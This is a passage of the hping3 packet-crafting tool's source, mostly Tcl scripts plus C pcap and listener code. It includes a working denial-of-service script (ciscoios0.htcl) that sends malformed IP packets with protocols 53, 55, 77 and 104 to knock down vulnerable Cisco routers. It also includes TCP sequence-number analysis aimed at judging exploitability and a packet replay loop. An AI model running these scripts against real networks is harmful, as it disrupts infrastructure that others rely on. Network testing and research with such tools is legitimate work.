"$protocol\\(.*?$field=(.*?)\[,\\)\].*?\\)" 21 | if [regexp $re $packet match value] { 22 | return $value 23 | } else { 24 | return {} 25 | } 26 | } 27 | 28 | proc GetIpSaddr packet { return [GetApdField ip saddr $packet] } 29 | proc GetIpDaddr packet { return [GetApdField ip daddr $packet] } 30 | proc GetIpTtl packet { return [GetApdField ip ttl $packet] } 31 | proc GetTcpSport packet { return [GetApdField tcp sport $packet] } 32 | proc GetTcpDport packet { return [GetApdField tcp dport $packet] } 33 | proc GetIcmpType packet { return [GetApdField icmp type $packet ] } 34 | proc GetIcmpCode packet { return [GetApdField icmp code $packet ] } 35 | proc GetIcmpId packet { return [GetApdField icmp id $packet ] } 36 | 37 | # Return non-zero if the host addr seems awake. 38 | # This is done sending a TCP ACK packet and an ICMP echo request 39 | # and searching for at least a reply. 40 | proc isawake addr { 41 | set addr [hping resolve $addr] 42 | set ifname [outifname $addr] 43 | set ifaddr [hping outifa $addr] 44 | 45 | hping recv eth0 0 46 | 47 | set ip "ip(saddr=$ifaddr,daddr=$addr,ttl=64)" 48 | append ack $ip "+tcp(sport=11005,dport=11111,flags=a)" 49 | append icmp $ip "+icmp(type=8,code=8,id=11111)" 50 | 51 | hping send $ack 52 | hping send $icmp 53 | 54 | for {set i 0} {$i < 10} {incr i} { 55 | set packets [hping recv $ifname 100 0] 56 | foreach p $packets { 57 | if {([GetIpSaddr $p] == $addr) && (([GetIcmpId $p] == 11111) || ([GetTcpSport $p] == 11111))} { 58 | return 1; 59 | } 60 | } 61 | } 62 | return 0; 63 | } 64 | 65 | # 66 | # End of the hping standard library 67 | # 68 | ################################################################################ 69 | 70 | # 71 | # Start 72 | # 73 | if {[llength $argv] == 0} { 74 | puts "Usage: hping exec countops.htcl targethost" 75 | } 76 | 77 | set target [hping resolve [lindex $argv 0]] 78 | puts "Target IP: $target" 79 | 80 | set outif [outifname $target] 81 | puts "Output Interface: $outif" 82 | 83 | set outifa [hping outifa $target] 84 | puts "Output Interface address: $outifa" 85 | 86 | # 87 | # Initialize the interface in reception 88 | # 89 | hping recv eth0 0 90 | 91 | # 92 | # Send an ACK packet to port 11111 93 | # The script use the RST reply to guess the Hops distance 94 | # 95 | set ack "ip(saddr=$outifa,daddr=$target,ttl=64)+" 96 | append ack "tcp(sport=11005,dport=11111,flags=a)" 97 | puts "sending the ACK packet..." 98 | hping send $ack 99 | 100 | # 101 | # Wait up to 3 seconds for incoming packets 102 | # Note that timeout is in milliseconds 103 | # 104 | set ttl {} 105 | for {set i 0} {$i < 30} {incr i} { 106 | set packets [hping recv $outif 100 0] 107 | foreach p $packets { 108 | if {[string match "*saddr=$target*" $p]} { 109 | set ttl [GetIpTtl $p] 110 | set i 30 111 | break 112 | } 113 | } 114 | } 115 | 116 | if {$ttl == {}} { 117 | puts "Sorry, no response back from $target" 118 | exit 1 119 | } 120 | 121 | set hops [expr 32-($ttl%32)] 122 | puts "Hops distance appears to be: $hops" 123 | 124 | # 125 | # Ready to test the CISCO problem 126 | # 127 | 128 | incr hops -1 129 | foreach protocol {53 55 77 104} { 130 | puts "Sending evil packet with protocol $protocol" 131 | set evil "ip(saddr=$outifa,daddr=$target,ttl=$hops,proto=$protocol)+" 132 | append evil "data(str=01234567890123456789123456)" 133 | #hping send $evil 134 | } 135 | 136 | # 137 | # Test if the host is still awake 138 | # 139 | 140 | puts "Waiting for 3 seconds..." 141 | after 3000 142 | if [isawake $target] { 143 | puts "The host appears to be still alive" 144 | } else { 145 | puts "The host appears to be down: vulnerable router?" 146 | } 147 | -------------------------------------------------------------------------------- /lib/ciscoios0.htcl: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | # 3 | # Helper functions 4 | # This will be part of the hping standard library (possibly modified) 5 | # 6 | 7 | # Return the name of the output interface for address addr 8 | proc outifname addr { 9 | set ifa [hping outifa $addr] 10 | set interfaces [hping iflist] 11 | foreach i $interfaces { 12 | if {$ifa == [lindex $i 1]} { 13 | return [lindex $i 0] 14 | } 15 | } 16 | error "Unable to find the output interface name for $addr" 17 | } 18 | 19 | proc GetApdField {protocol field packet} { 20 | set re "$protocol\\(.*?$field=(.*?)\[,\\)\].*?\\)" 21 | if [regexp $re $packet match value] { 22 | return $value 23 | } else { 24 | return {} 25 | } 26 | } 27 | 28 | proc GetIpSaddr packet { return [GetApdField ip saddr $packet] } 29 | proc GetIpDaddr packet { return [GetApdField ip daddr $packet] } 30 | proc GetIpTtl packet { return [GetApdField ip ttl $packet] } 31 | proc GetTcpSport packet { return [GetApdField tcp sport $packet] } 32 | proc GetTcpDport packet { return [GetApdField tcp dport $packet] } 33 | proc GetIcmpType packet { return [GetApdField icmp type $packet ] } 34 | proc GetIcmpCode packet { return [GetApdField icmp code $packet ] } 35 | proc GetIcmpId packet { return [GetApdField icmp id $packet ] } 36 | 37 | # Return non-zero if the host addr seems awake. 38 | # This is done sending a TCP ACK packet and an ICMP echo request 39 | # and searching for at least a reply. 40 | proc isawake addr { 41 | set addr [hping resolve $addr] 42 | set ifname [outifname $addr] 43 | set ifaddr [hping outifa $addr] 44 | 45 | hping recv eth0 0 46 | 47 | set ip "ip(saddr=$ifaddr,daddr=$addr,ttl=64)" 48 | append ack $ip "+tcp(sport=11005,dport=11111,flags=a)" 49 | append icmp $ip "+icmp(type=8,code=8,id=11111)" 50 | 51 | hping send $ack 52 | hping send $icmp 53 | 54 | for {set i 0} {$i < 10} {incr i} { 55 | set packets [hping recv $ifname 100 0] 56 | foreach p $packets { 57 | if {([GetIpSaddr $p] == $addr) && (([GetIcmpId $p] == 11111) || ([GetTcpSport $p] == 11111))} { 58 | return 1; 59 | } 60 | } 61 | } 62 | return 0; 63 | } 64 | 65 | # 66 | # End of the hping standard library 67 | # 68 | ################################################################################ 69 | 70 | # 71 | # Start 72 | # 73 | if {[llength $argv] == 0} { 74 | puts "Usage: hping exec countops.htcl targethost" 75 | } 76 | 77 | set target [hping resolve [lindex $argv 0]] 78 | puts "Target IP: $target" 79 | 80 | set outif [outifname $target] 81 | puts "Output Interface: $outif" 82 | 83 | set outifa [hping outifa $target] 84 | puts "Output Interface address: $outifa" 85 | 86 | # 87 | # Initialize the interface in reception 88 | # 89 | hping recv eth0 0 90 | 91 | # 92 | # Send an ACK packet to port 11111 93 | # 94 | set ack "ip(saddr=$outifa,daddr=$target,ttl=64)+" 95 | append ack "tcp(sport=11005,dport=11111,flags=a)" 96 | puts "sending the ACK packet..." 97 | hping send $ack 98 | 99 | # 100 | # Wait up to 3 seconds for incoming packets 101 | # Note that timeout is in milliseconds 102 | # 103 | set packets [hping recv $outif 3000 0] 104 | 105 | set ttl {} 106 | foreach p $packets { 107 | #puts "[GetIpSaddr $p] -> [GetIpDaddr $p]" 108 | if {[string match "*saddr=$target*" $p]} { 109 | #regexp {ttl=([0-9]+)} $p match ttl 110 | set ttl [GetIpTtl $p] 111 | } 112 | } 113 | 114 | if {$ttl == {}} { 115 | puts "Sorry, no response back from $target" 116 | exit 1 117 | } 118 | 119 | set hops [expr 32-($ttl%32)] 120 | puts "Hops distance appears to be: $hops" 121 | 122 | # 123 | # Ready to test the CISCO problem 124 | # 125 | 126 | incr hops -1 127 | foreach protocol {53 55 77 104} { 128 | puts "Sending evil packet with protocol $protocol" 129 | set evil "ip(saddr=$outifa,daddr=$target,ttl=$hops,proto=$protocol)+" 130 | append evil "data(str=01234567890123456789123456)" 131 | hping send $evil 132 | } 133 | 134 | # 135 | # Test if the host is still awake 136 | # 137 | 138 | if [isawake $target] { 139 | puts "The host appears to be still alive" 140 | } else { 141 | puts "The host appears to be down: vulnerable router?" 142 | } 143 | -------------------------------------------------------------------------------- /lib/cloner.htcl: -------------------------------------------------------------------------------- 1 | while {1} { 2 | set x [hping recvraw eth0] 3 | hping sendraw [lindex $x 0] 4 | hping sendraw [lindex $x 0] 5 | hping sendraw [lindex $x 0] 6 | hping sendraw [lindex $x 0] 7 | } 8 | -------------------------------------------------------------------------------- /lib/hpingstdlib.htcl: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | # 3 | # Helper functions 4 | # This will be part of the hping standard library (possibly modified) 5 | # 6 | 7 | ################################################################################ 8 | # Functions related to network interface managment 9 | ################################################################################ 10 | 11 | # Return the name of the output interface for address addr 12 | proc outifname addr { 13 | set ifa [hping outifa $addr] 14 | set interfaces [hping iflist] 15 | foreach i $interfaces { 16 | foreach ia [lindex $i 2] { 17 | if {$ifa == $ia} { 18 | return [lindex $i 0] 19 | } 20 | } 21 | } 22 | error "Unable to find the output interface name for $addr" 23 | } 24 | 25 | ################################################################################ 26 | # Functions related to packets description 27 | ################################################################################ 28 | 29 | interp alias {} GetApdField {} hping getfield 30 | 31 | proc SetApdField {protocol field value pvar} { 32 | upvar $pvar p 33 | set p [hping setfield $protocol $field $value $p] 34 | } 35 | 36 | proc DelApdField {protocol field pvar} { 37 | upvar $pvar p 38 | set p [hping delfield $protocol $field $p] 39 | } 40 | 41 | interp alias {} GetIpSaddr {} hping getfield ip saddr 42 | interp alias {} GetIpDaddr {} hping getfield ip daddr 43 | interp alias {} GetIpTtl {} hping getfield ip ttl 44 | interp alias {} GetIpProto {} hping getfield ip proto 45 | interp alias {} GetTcpSport {} hping getfield tcp sport 46 | interp alias {} GetTcpDport {} hping getfield tcp dport 47 | interp alias {} GetTcpSeq {} hping getfield tcp seq 48 | interp alias {} GetTcpAck {} hping getfield tcp ack 49 | interp alias {} GetTcpTimestampVal {} hping getfield tcp.timestamp val 50 | interp alias {} GetTcpTimestampEcr {} hping getfield tcp.timestamp ecr 51 | interp alias {} GetIcmpType {} hping getfield icmp type 52 | interp alias {} GetIcmpCode {} hping getfield icmp code 53 | interp alias {} GetIcmpId {} hping getfield icmp id 54 | interp alias {} GetIcmpSeq {} hping getfield icmp seq 55 | interp alias {} GetDataHex {} hping getfield data hex 56 | 57 | # From APD to Tcl list 58 | proc apd2list apd { 59 | set list {} 60 | foreach layer [split $apd +] { 61 | set t [split $layer ()] 62 | set name [lindex $t 0] 63 | set fields [lindex $t 1] 64 | set l [list $name] 65 | foreach fieldvalue [split $fields ,] { 66 | foreach {field value} [split $fieldvalue =] break 67 | lappend l [list $field $value] 68 | } 69 | lappend list $l 70 | } 71 | return $list 72 | } 73 | 74 | # From Tcl list to APD 75 | proc list2apd list { 76 | if {![llength $list]} return 77 | foreach layer $list { 78 | append apd [lindex $layer 0] ( 79 | set layer [lrange $layer 1 end] 80 | foreach fieldvalue $layer { 81 | append apd [lindex $fieldvalue 0] = [lindex $fieldvalue 1] , 82 | } 83 | if {[llength $layer] != 0} { 84 | set apd [string range $apd 0 end-1] 85 | } 86 | append apd )+ 87 | } 88 | set apd [string range $apd 0 end-1] 89 | return $apd 90 | } 91 | 92 | ################################################################################ 93 | # High-level networking functions 94 | ################################################################################ 95 | 96 | # Return non-zero if the host addr seems awake. 97 | # This is done sending a TCP ACK packet and an ICMP echo request 98 | # and searching for at least a reply. 99 | proc isawake addr { 100 | set addr [hping resolve $addr] 101 | set ifname [outifname $addr] 102 | set ifaddr [hping outifa $addr] 103 | 104 | hping recv eth0 0 105 | 106 | set ip "ip(saddr=$ifaddr,daddr=$addr,ttl=64)" 107 | append ack $ip "+tcp(sport=11005,dport=11111,flags=a)" 108 | append icmp $ip "+icmp(type=8,code=8,id=11111)" 109 | 110 | hping send $ack 111 | hping send $icmp 112 | 113 | for {set i 0} {$i < 10} {incr i} { 114 | set packets [hping recv $ifname 100 0] 115 | foreach p $packets { 116 | if {([GetIpSaddr $p] == $addr) && (([GetIcmpId $p] == 11111) || ([GetTcpSport $p] == 11111))} { 117 | return 1; 118 | } 119 | } 120 | } 121 | return 0; 122 | } 123 | 124 | # Todo, check the OS's version and to what needed. 125 | proc DropOutgoingResets {} { 126 | exec "iptables -A OUTPUT -p tcp -j DROP --tcp-flags RST RST" 127 | } 128 | 129 | ################################################################################ 130 | # Non hping specific Tcl functions that seems to help 131 | ################################################################################ 132 | 133 | proc isempty l { 134 | expr {[llength $l] == 0} 135 | } 136 | 137 | proc haskey {arrayname key} { 138 | expr {[llength [uplevel "array names $arrayname -exact $key"]] != 0} 139 | } 140 | 141 | # 142 | # End of the hping standard library 143 | # 144 | ################################################################################ 145 | 146 | # vim: filetype=tcl 147 | -------------------------------------------------------------------------------- /lib/igrp.htcl: -------------------------------------------------------------------------------- 1 | #hping send "ip(saddr=192.168.41.183,daddr=255.255.255.255,ttl=255)+igrp(opcode=update,edition=[expr 114+$i],autosys=1,interior=1,system=0,exterior=0)+igrp.entry(dest=$i.7.6)" 2 | 3 | hping send "ip(saddr=192.168.41.183,daddr=192.168.41.184,ttl=255)+igrp(opcode=request,edition=100,autosys=1,interior=0,system=0,exterior=0)" 4 | -------------------------------------------------------------------------------- /lib/isn-spectrogram.htcl: -------------------------------------------------------------------------------- 1 | # isn-spectrogram.htcl -- show the ISN increments "spectrogram". 2 | # Copyright(C) 2003 Salvatore Sanfilippo. 3 | # 4 | # All rights reserved. 5 | # 6 | # Here the idea is very simple, in operating systems implemeting 7 | # ISN as random increments, it is useless to analyze the whole 8 | # sequence number, because the random part is just the increment. 9 | # Morover, some weaknes isn't about correlation between previous 10 | # and successive increments, but just about increments don't show 11 | # a good distribution. So the idea is to display a spectrogram 12 | # of the increments distribution instead of the more complex to read 13 | # 3D attractors (See [1]). This way is possible to see at least some of 14 | # the common vulnerabilties you can discover with 3D attractors, 15 | # but it is much simpler to guess how hard is to exploit the system 16 | # just from the picture. 17 | # 18 | # [1] http://razor.bindview.com/publish/papers/tcpseq.html 19 | # 20 | # Please if you make this script better write me back the 21 | # changes. (antirez@invece.org). 22 | # 23 | # The script requires Tk to run. 24 | 25 | package require Tk 26 | source hpingstdlib.htcl 27 | 28 | if {$argc != 3} { 29 | puts stderr "Usage: isn-spectrogram " 30 | puts stderr "Example: isn-spectrogram www.example.com 100000 80" 31 | exit 32 | } 33 | 34 | set bgcolor {#000000} 35 | wm title . {hping3 -- attractors} 36 | set w .main 37 | frame $w 38 | pack $w -side top 39 | . config -background $bgcolor 40 | $w config -background $bgcolor 41 | 42 | # canvas 43 | set xres 800 44 | set yres 800 45 | canvas $w.can -width $xres -height $yres 46 | $w.can config -background $bgcolor 47 | pack $w.can -fill both -expand true 48 | 49 | # globals 50 | foreach {hostname div dport} $argv break 51 | set sport 1 52 | #set dport 80 53 | set target [hping resolve $hostname] 54 | set targetif [outifname $target] 55 | set myip [hping outifa $target] 56 | set isnqueue {} 57 | set relative_attractor 1 58 | set lastisn 0 59 | #set div 10000000 60 | 61 | hping setfilter $targetif "tcp and src host $target" 62 | 63 | 64 | $w.can create rectangle 40 450 139 450 -fill white -width 0 65 | $w.can create text 90 470 -fill white -text [expr $div*100] 66 | 67 | proc sendsyn {} { 68 | global sport dport myip target 69 | append syn "ip(saddr=$myip,daddr=$target,ttl=255)+" 70 | append syn "tcp(sport=$sport,dport=$dport,flags=s)" 71 | hping send $syn 72 | incr sport 73 | after 1 sendsyn 74 | } 75 | 76 | proc recvsynack {} { 77 | global lastisn relative_attractor 78 | 79 | set packets [hping recv eth0 0 0] 80 | foreach p $packets { 81 | if {![hping hasfield tcp flags $p]} continue 82 | set isn [hping getfield tcp seq $p] 83 | if {$relative_attractor} { 84 | set tisn [expr abs($isn-$lastisn)] 85 | set lastisn $isn 86 | set isn $tisn 87 | } 88 | #puts "ISN: $isn" 89 | displaypoint $isn 90 | } 91 | after 10 recvsynack 92 | } 93 | 94 | proc displaypoint isn { 95 | global w xres yres pastcol div 96 | 97 | set isn [expr $isn/$div] 98 | set y 300 99 | set x $isn 100 | puts "$x $y" 101 | if {[haskey pastcol $x.$y]} { 102 | set graylevel [incr pastcol($x.$y) 10] 103 | } else { 104 | set pastcol($x.$y) 0 105 | set graylevel 0 106 | } 107 | if {$graylevel >= 256*3} { 108 | set graylevel [expr (256*3)-1] 109 | } 110 | if {$graylevel <= 255} { 111 | set b $graylevel 112 | set g 0 113 | set r 0 114 | } elseif {$graylevel <= 511} { 115 | set b 0 116 | set g [expr $graylevel - 256] 117 | set r 255 118 | } elseif {$graylevel <= 767} { 119 | set b 255 120 | set g 255 121 | set r [expr $graylevel - 512] 122 | } 123 | set color [format "#%02X%02X%02X" $r $g $b] 124 | $w.can create rectangle $x $y [expr $x+1] [expr $y+100] -fill $color -width 0 125 | } 126 | 127 | after 1 sendsyn 128 | after 1 recvsynack 129 | 130 | vwait forever 131 | 132 | # vim: filetype=tcl softtabstop=4 133 | -------------------------------------------------------------------------------- /lib/passivets.htcl: -------------------------------------------------------------------------------- 1 | # Try to discover hosts's uptime in a passive-fashion (i.e. locking 2 | # at the traffic). Maybe it's a bit buggy, but just an exaple. 3 | 4 | source "hpingstdlib.htcl" 5 | 6 | while {1} { 7 | set packets [hping recv eth0 -1] 8 | set p [lindex $packets 0] 9 | set srcaddr [GetIpSaddr $p] 10 | if {[string length [array names ignore $srcaddr]]} { 11 | continue 12 | } 13 | set tsval [GetTcpTimestampVal $p] 14 | if {$tsval != {}} { 15 | #puts "$srcaddr: $tsval ([clock clicks -milliseconds])" 16 | if {[string length [array names lastval $srcaddr]]} { 17 | set xms [expr [clock clicks -milliseconds] - $lastms($srcaddr)] 18 | if {$xms >= 1000} { 19 | set xval [expr $tsval-$lastval($srcaddr)] 20 | set hz [expr ($xval/$xms.0)*1000] 21 | set hz [expr round($hz)] 22 | #puts "$srcaddr: XVAL=$xval XMS=$xms HZ=$hz" 23 | #set lastval($srcaddr) $tsval 24 | #set lastms($srcaddr) [clock clicks -milliseconds] 25 | if {($hz%10) == 0 && $hz != 0} { 26 | set upseconds [expr $tsval / $hz] 27 | set days [expr $upseconds/(3600*24)] 28 | set upseconds [expr $upseconds%(3600*24)] 29 | set hours [expr $upseconds/3600] 30 | set upseconds [expr $upseconds % 3600] 31 | set minutes [expr $upseconds/60] 32 | set upseconds [expr $upseconds % 60] 33 | set seconds $upseconds 34 | puts "[hping resolve -ptr $srcaddr] ($srcaddr) UPTIME=$days days, $hours hours, $minutes minutes, $seconds seconds" 35 | set ignore($srcaddr) yes 36 | } 37 | } 38 | } else { 39 | set lastval($srcaddr) $tsval 40 | set lastms($srcaddr) [clock clicks -milliseconds] 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /lib/ping.htcl: -------------------------------------------------------------------------------- 1 | #hping softrealtime 1 2 | source "hpingstdlib.htcl" 3 | 4 | if {$argc != 1} { 5 | puts "usage: ping.htcl hostname" 6 | exit 1 7 | } 8 | 9 | set target [lindex $argv 0] 10 | set targetip [hping resolve $target] 11 | 12 | puts "PING $target ($targetip): 56 data bytes" 13 | 14 | set outifaddr [hping outifa $targetip] 15 | set outifname [outifname $targetip] 16 | hping setfilter $outifname "icmp and host $targetip" 17 | 18 | set icmp_id [expr int(rand()*65536)] 19 | set icmp_seq 0 20 | array set icmp_rtt_tab {} 21 | 22 | proc send_icmp {} { 23 | after 1000 send_icmp 24 | global outifaddr targetip icmp_id icmp_seq icmp_rtt_tab 25 | append icmp "ip(saddr=$outifaddr,daddr=$targetip,ttl=255)+" 26 | append icmp "icmp(type=8,code=0,id=$icmp_id,seq=$icmp_seq)+" 27 | append icmp "data(str=[string repeat X 28])" 28 | set icmp_rtt_tab($icmp_seq) [clock clicks -milliseconds] 29 | hping send $icmp 30 | #puts "! $icmp_seq" 31 | incr icmp_seq 32 | } 33 | 34 | proc recv_icmp {} { 35 | global outifname outifaddr targetip icmp_id icmp_rtt_tab 36 | set packets [hping recv $outifname 0 1000] 37 | #puts [llength $packets] 38 | foreach p $packets { 39 | if {[GetIpSaddr $p] != $targetip} continue 40 | if {[GetIpDaddr $p] != $outifaddr} continue 41 | if {[GetIcmpType $p] != 0} continue 42 | if {[GetIcmpCode $p] != 0} continue 43 | if {[GetIcmpId $p] != $icmp_id} continue 44 | 45 | set seq [GetIcmpSeq $p] 46 | set ttl [GetIpTtl $p] 47 | set rtt [expr [clock clicks -milliseconds] - $icmp_rtt_tab($seq)] 48 | puts "xxx bytes from [GetIpSaddr $p]: icmp_seq=$seq ttl=$ttl time=$rtt.0 ms" 49 | } 50 | after 10 recv_icmp 51 | } 52 | 53 | hping recv $outifname 0 54 | 55 | after 10 send_icmp 56 | after idle recv_icmp 57 | vwait forver 58 | 59 | # vim: filetype=tcl 60 | -------------------------------------------------------------------------------- /lib/raw.htcl: -------------------------------------------------------------------------------- 1 | while {1} { 2 | set packets [hping recvraw eth0 -1 1] 3 | foreach p $packets { 4 | set len [string bytelength $p] 5 | binary scan $p H* hex 6 | puts "$len: $hex\n" 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /lib/regtest/rt0.htcl: -------------------------------------------------------------------------------- 1 | # SIGSEGV due to ipopt compilation bug: the padding code didn't set realloc() 2 | # result in layer->l_data field. Fixed. 3 | 4 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.nop+ip.nop+ip.sec+icmp} 5 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.nop+ip.nop+ip.sec+ip.eol+icmp} 6 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.nop+ip.nop+ip.sec+ip.eol+icmp} 7 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.sec+ip.eol+icmp} 8 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.eol+icmp} 9 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.eol+icmp} 10 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.eol+ip.nop+ip.eol+icmp} 11 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.eol+ip.nop+ip.eol+ip.ts+icmp} 12 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.sec+ip.nop+ip.nop+ip.sec+icmp} 13 | hping send {ip(saddr=192.168.1.6,daddr=192.168.1.7)+ip.nop+ip.sec+ip.nop+ip.eol+ip.nop+ip.eol+ip.sec+icmp} 14 | -------------------------------------------------------------------------------- /lib/show-tcpseq.htcl: -------------------------------------------------------------------------------- 1 | # Show TCP sequence numbers read from the specified interface's traffic 2 | # graphically. If you click on the points with the mouse, the IP address 3 | # of the associated host is shown, and all the traffic about that 4 | # host gets highlighted. 5 | 6 | if {![llength $argv]} { 7 | puts stderr "Please, specify the name of an interface" 8 | exit 9 | } 10 | set ifname [lindex $argv 0] 11 | 12 | package require Tk 13 | source hpingstdlib.htcl 14 | 15 | set bgcolor {#000000} 16 | wm title . {hping3 -- show-tcpseq} 17 | set w .main 18 | frame $w 19 | pack $w -side top 20 | . config -background $bgcolor 21 | $w config -background $bgcolor 22 | 23 | # colors 24 | set colors {red green blue gray yellow purple cyan brown} 25 | set coloridx 0 26 | array set hosts {} 27 | set start_time [clock seconds] 28 | 29 | proc getcolor {} { 30 | global colors coloridx 31 | 32 | set l [llength $colors] 33 | set i [expr $coloridx % $l] 34 | set c [lindex $colors $i] 35 | incr coloridx 36 | return $c 37 | } 38 | 39 | # canvas 40 | set xres 1024 41 | set yres 760 42 | canvas $w.can -width $xres -height $yres 43 | $w.can config -background $bgcolor 44 | pack $w.can -fill both -expand true 45 | $w.can bind all {ButtonPress %x %y %W} 46 | $w.can bind all {ButtonRelease %x %y %W} 47 | 48 | # bindings 49 | proc ButtonPress {x y W} { 50 | global tag 51 | 52 | set id [$W find closest $x $y] 53 | set tags [$W gettags $id] 54 | set tag [lindex $tags 0] 55 | set name [hping resolve -ptr $tag] 56 | 57 | # Highlight all the points about that IP address 58 | $W itemconfigure $tag -width 1 -outline gray70 59 | $W create text $x $y -text $name -tag nametext -fill white -anchor n 60 | } 61 | 62 | proc ButtonRelease {x y W} { 63 | global tag hosts 64 | 65 | # Restore the color 66 | $W itemconfigure $tag -width 0 67 | $W delete nametext 68 | } 69 | 70 | # main loop 71 | while {1} { 72 | set packets [hping recv $::ifname 100] 73 | foreach p $packets { 74 | if {![hping hasfield tcp seq $p]} continue 75 | set seq [hping getfield tcp seq $p] 76 | set ip [hping getfield ip saddr $p] 77 | if {[haskey hosts $ip]} { 78 | set color $hosts($ip) 79 | } else { 80 | set color [getcolor] 81 | set hosts($ip) $color 82 | } 83 | set now [clock seconds] 84 | set elapsed [expr {$now-$start_time}] 85 | if {$elapsed >= $xres} { 86 | set start_time $now 87 | set elapsed 0 88 | $w.can delete all 89 | } 90 | set y [expr {int($seq/5651272)}] 91 | set x $elapsed 92 | #puts "$seq -> $y" 93 | $w.can create oval $x $y [expr $x+3] [expr $y+3] -fill $color -width 0 -tag $ip 94 | } 95 | update 96 | } 97 | 98 | # vim: filetype=tcl softtabstop=4 99 | -------------------------------------------------------------------------------- /lib/showled.htcl: -------------------------------------------------------------------------------- 1 | package require Tk 2 | 3 | set bgcolor {#FFFFFF} 4 | 5 | wm title . {hping3 -- showled} 6 | 7 | set w .main 8 | 9 | frame $w 10 | pack $w -side top 11 | . config -background $bgcolor 12 | $w config -background $bgcolor 13 | 14 | # canvas 15 | set ifnum [llength [hping iflist]] 16 | canvas $w.can -width 100 -height [expr ($ifnum*25)+40] 17 | $w.can config -background $bgcolor 18 | pack $w.can -fill both -expand true 19 | 20 | # show leds 21 | proc draw {} { 22 | global w 23 | 24 | set ifnum [llength [hping iflist]] 25 | $w.can config -width 100 -height [expr ($ifnum*25)+40] 26 | $w.can delete all 27 | set y 20 28 | foreach i [hping iflist] { 29 | set ifname [lindex $i 0] 30 | if {[string match *NOLINK* [lindex $i 4]]} { 31 | set color red 32 | } else { 33 | set color green 34 | } 35 | $w.can create oval 20 $y 40 [expr $y+20] -fill $color -width 1 -outline black -tag $ifname 36 | $w.can create text 60 [expr $y+10] -text $ifname -tag $ifname.t 37 | incr y 25 38 | } 39 | after 1000 draw 40 | } 41 | 42 | after 0 draw 43 | 44 | #vim: set filetype=tcl softtabstop=4 45 | -------------------------------------------------------------------------------- /libpcap_stuff.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: libpcap_stuff.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: libpcap_stuff.c,v 1.3 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include "hping2.h" 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #include "globals.h" 23 | 24 | int open_pcap() 25 | { 26 | int on; 27 | 28 | on = 1; /* no warning if BIOCIMMEDIATE will not be compiled */ 29 | if (opt_debug) 30 | printf("DEBUG: pcap_open_live(%s, 99999, 0, 1, %p)\n", 31 | ifname, errbuf); 32 | 33 | pcapfp = pcap_open_live(ifname, 99999, 0, 1, errbuf); 34 | if (pcapfp == NULL) { 35 | printf("[open_pcap] pcap_open_live: %s\n", errbuf); 36 | return -1; 37 | } 38 | #if (!defined OSTYPE_LINUX) && (!defined __sun__) 39 | /* Return the packets to userspace as fast as possible */ 40 | if (ioctl(pcap_fileno(pcapfp), BIOCIMMEDIATE, &on) == -1) 41 | perror("[open_pcap] ioctl(... BIOCIMMEDIATE ...)"); 42 | #endif 43 | return 0; 44 | } 45 | 46 | int close_pcap() 47 | { 48 | pcap_close(pcapfp); 49 | return 0; 50 | } 51 | 52 | int pcap_recv(char *packet, unsigned int size) 53 | { 54 | char *p = NULL; 55 | int pcapsize; 56 | 57 | if (opt_debug) 58 | printf("DEBUG: under pcap_recv()\n"); 59 | 60 | while(p == NULL) { 61 | p = (unsigned char*) pcap_next(pcapfp, &hdr); 62 | if (p == NULL && opt_debug) 63 | printf("DEBUG: [pcap_recv] p = NULL\n"); 64 | } 65 | 66 | pcapsize = hdr.caplen; 67 | 68 | if (pcapsize < size) 69 | size = pcapsize; 70 | 71 | memcpy(packet, p, pcapsize); 72 | 73 | return pcapsize; 74 | } 75 | -------------------------------------------------------------------------------- /listen.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: listen.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:48 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: listen.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" /* hping2.h includes hcmp.h */ 22 | #include "globals.h" 23 | 24 | void listenmain(void) 25 | { 26 | int size, ip_size; 27 | int stdoutFD = fileno(stdout); 28 | char packet[IP_MAX_SIZE+linkhdr_size]; 29 | char *p, *ip_packet; 30 | struct myiphdr ip; 31 | __u16 id; 32 | static __u16 exp_id; /* expected id */ 33 | 34 | exp_id = 1; 35 | 36 | while(1) { 37 | size = read_packet(packet, IP_MAX_SIZE+linkhdr_size); 38 | switch(size) { 39 | case 0: 40 | continue; 41 | case -1: 42 | exit(1); 43 | } 44 | 45 | /* Skip truncated packets */ 46 | if (size < linkhdr_size+IPHDR_SIZE) 47 | continue; 48 | ip_packet = packet + linkhdr_size; 49 | 50 | /* copy the ip header so it will be aligned */ 51 | memcpy(&ip, ip_packet, sizeof(ip)); 52 | id = ntohs(ip.id); 53 | ip_size = ntohs(ip.tot_len); 54 | if (size-linkhdr_size > ip_size) 55 | size = ip_size; 56 | else 57 | size -= linkhdr_size; 58 | 59 | if ((p = 